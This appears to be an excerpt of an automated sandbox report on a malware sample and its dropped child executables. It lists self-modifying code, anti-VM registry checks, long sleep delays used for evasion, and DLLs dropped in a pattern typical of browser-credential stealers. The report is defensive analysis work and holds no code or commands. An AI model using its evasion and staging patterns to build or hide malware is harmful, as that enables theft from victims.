                              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C2EE2D instructions caused by: Self-modifying code
                              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DD3F00 instructions caused by: Self-modifying code
                              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DD283A instructions caused by: Self-modifying code
                              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E65CA0 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: F0EE2D instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 10B3F00 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 10B283A instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 1145CA0 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeSpecial instruction interceptor: First address: F0FBB8 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeSpecial instruction interceptor: First address: F0FB00 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeSpecial instruction interceptor: First address: 10B4AB0 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeSpecial instruction interceptor: First address: A549A8 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeSpecial instruction interceptor: First address: C87B29 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeSpecial instruction interceptor: First address: E2ABD0 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeSpecial instruction interceptor: First address: EB79F9 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeSpecial instruction interceptor: First address: 11BF990 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeSpecial instruction interceptor: First address: 11BFA91 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeSpecial instruction interceptor: First address: 11BF98A instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeSpecial instruction interceptor: First address: 135B745 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeSpecial instruction interceptor: First address: 1366F9B instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeSpecial instruction interceptor: First address: 13EB3C4 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeSpecial instruction interceptor: First address: CBDD7B instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeSpecial instruction interceptor: First address: EE8EEC instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeSpecial instruction interceptor: First address: 137CAA instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeSpecial instruction interceptor: First address: 137DAD instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeSpecial instruction interceptor: First address: 2CD7FD instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeSpecial instruction interceptor: First address: 362DF2 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeMemory allocated: 2160000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeMemory allocated: 2330000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeMemory allocated: 4330000 memory reserve | memory write watch
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeMemory allocated: 15C06C50000 memory reserve | memory write watch
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeMemory allocated: 15C206B0000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeMemory allocated: 5380000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeMemory allocated: 5660000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeMemory allocated: 7660000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeMemory allocated: 5450000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeMemory allocated: 54F0000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeMemory allocated: 74F0000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04990CDA rdtsc 0_2_04990CDA
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 596067
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 595936
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 595609
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 595097
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 594922
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 594750
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 594633
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 594484
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeThread delayed: delay time: 922337203685477
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeThread delayed: delay time: 922337203685477
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1010Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1094Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1092Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1036Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1076Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeWindow / User API: threadDelayed 4721
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeWindow / User API: threadDelayed 4875
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4881
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1607
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6199
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1736
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeWindow / User API: threadDelayed 1230
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeWindow / User API: threadDelayed 1256
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeWindow / User API: threadDelayed 1233
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeWindow / User API: threadDelayed 1242
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeWindow / User API: threadDelayed 1230
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeWindow / User API: threadDelayed 1233
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeWindow / User API: threadDelayed 1200
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeWindow / User API: threadDelayed 1222
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeWindow / User API: threadDelayed 1328
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeWindow / User API: threadDelayed 1347
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeWindow / User API: threadDelayed 836
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeWindow / User API: threadDelayed 841
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeWindow / User API: threadDelayed 1355
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeWindow / User API: threadDelayed 1330
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeWindow / User API: threadDelayed 1248
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeWindow / User API: threadDelayed 1218
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeWindow / User API: threadDelayed 1220
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeWindow / User API: threadDelayed 1232
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeWindow / User API: threadDelayed 1237
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeWindow / User API: threadDelayed 1217
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeWindow / User API: threadDelayed 1213
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeWindow / User API: threadDelayed 547
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1019677001\fbaaecbd82.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1019678001\e577d0589a.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1019676001\6cc6a39605.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[4].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Ae01fdzV5f53ffefSw3BEvKVeV\Bunifu_UI_v1.5.3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019674001\fdd59fd4bc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019674001\fdd59fd4bc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\service123.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1019679001\cd81608004.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Ae01fdzV5f53ffefSw3BEvKVeV\Y-Cleaner.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[5].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6100Thread sleep count: 1010 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6100Thread sleep time: -2021010s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5808Thread sleep count: 1094 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5808Thread sleep time: -2189094s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4544Thread sleep count: 1092 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4544Thread sleep time: -2185092s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2304Thread sleep count: 242 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2304Thread sleep time: -7260000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1396Thread sleep count: 1036 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1396Thread sleep time: -2073036s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6104Thread sleep count: 1076 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6104Thread sleep time: -2153076s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exe TID: 7700Thread sleep time: -210000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -27670116110564310s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -100000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -99842s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -99718s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -99563s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -99437s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -99328s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -99218s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -99109s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -99000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -98889s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -98765s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -98656s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -98547s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -98437s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -98306s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -98171s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -98038s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -97471s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -97358s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -97201s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -97085s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -96984s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -96859s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -96749s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -96640s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -96517s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -96390s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -96268s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -96156s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -96047s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -95922s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -95812s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -95703s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -95593s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -95462s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -95350s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -95203s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -94687s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -94562s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -94449s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -94460s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -94294s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -94171s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -94030s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -93890s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -93765s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -93640s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -93528s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -93359s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -93231s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -596067s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -595936s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -595609s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -595097s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -594922s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -594750s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -594633s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7764Thread sleep time: -594484s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 2300Thread sleep time: -30000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe TID: 7756Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7868Thread sleep count: 4881 > 30
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7868Thread sleep count: 1607 > 30
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7904Thread sleep time: -1844674407370954s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7884Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8068Thread sleep count: 6199 > 30
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8060Thread sleep count: 1736 > 30
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8076Thread sleep time: -4611686018427385s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1360Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exe TID: 8152Thread sleep count: 1230 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exe TID: 8152Thread sleep time: -2461230s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exe TID: 8160Thread sleep count: 1256 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exe TID: 8160Thread sleep time: -2513256s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exe TID: 8164Thread sleep count: 1233 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exe TID: 8164Thread sleep time: -2467233s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exe TID: 8120Thread sleep count: 1242 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exe TID: 8120Thread sleep time: -2485242s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exe TID: 8156Thread sleep count: 1230 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exe TID: 8156Thread sleep time: -2461230s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exe TID: 8148Thread sleep count: 1233 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exe TID: 8148Thread sleep time: -2467233s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exe TID: 8144Thread sleep count: 1200 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exe TID: 8144Thread sleep time: -2401200s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exe TID: 8140Thread sleep count: 1222 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exe TID: 8140Thread sleep time: -2445222s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe TID: 6428Thread sleep count: 1328 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe TID: 6428Thread sleep time: -2657328s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe TID: 6480Thread sleep count: 1347 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe TID: 6480Thread sleep time: -2695347s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe TID: 1868Thread sleep time: -40000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe TID: 6860Thread sleep count: 836 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe TID: 6860Thread sleep time: -1672836s >= -30000s
